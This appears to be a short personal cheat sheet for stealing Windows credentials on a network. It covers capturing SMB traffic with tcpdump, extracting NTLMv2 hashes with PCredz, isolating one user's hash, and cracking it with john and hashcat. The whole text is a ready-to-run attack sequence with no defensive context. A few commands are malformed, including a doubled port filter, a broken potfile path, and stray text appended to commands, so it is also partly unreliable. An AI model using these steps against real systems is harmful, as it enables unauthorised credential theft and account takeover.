capture:
> tcpdump -nv -s0 port 445 -w /tmp/winauth.pcap port 445
-s0 means grab-everything. more effective in older systems.
connect:
> smbclient //10.10.10.10/c$ Server1 -U bob
scan:
> cd /opt/PCredz/
> Pcredz -v -f /tmp/winauth.pcap
trim:
> cat CredentialsDump-Session.log
> grep bob CredentialsDump-Session.log | cut -d ' ' -f 5 | tee hash.txt
> cat hash.txt
crack:
> john hash.txt ..done!!
> hashcat -w 3 -a 0 -m 5600 hash.txt ..done!!
cat ~./hashcat/hashcat.potfile
or: yuck like this:
hashcat -m 5600 --potfile-path ~/.hashcat/hashcat.potfile --show --outfile-format 2 hash.txt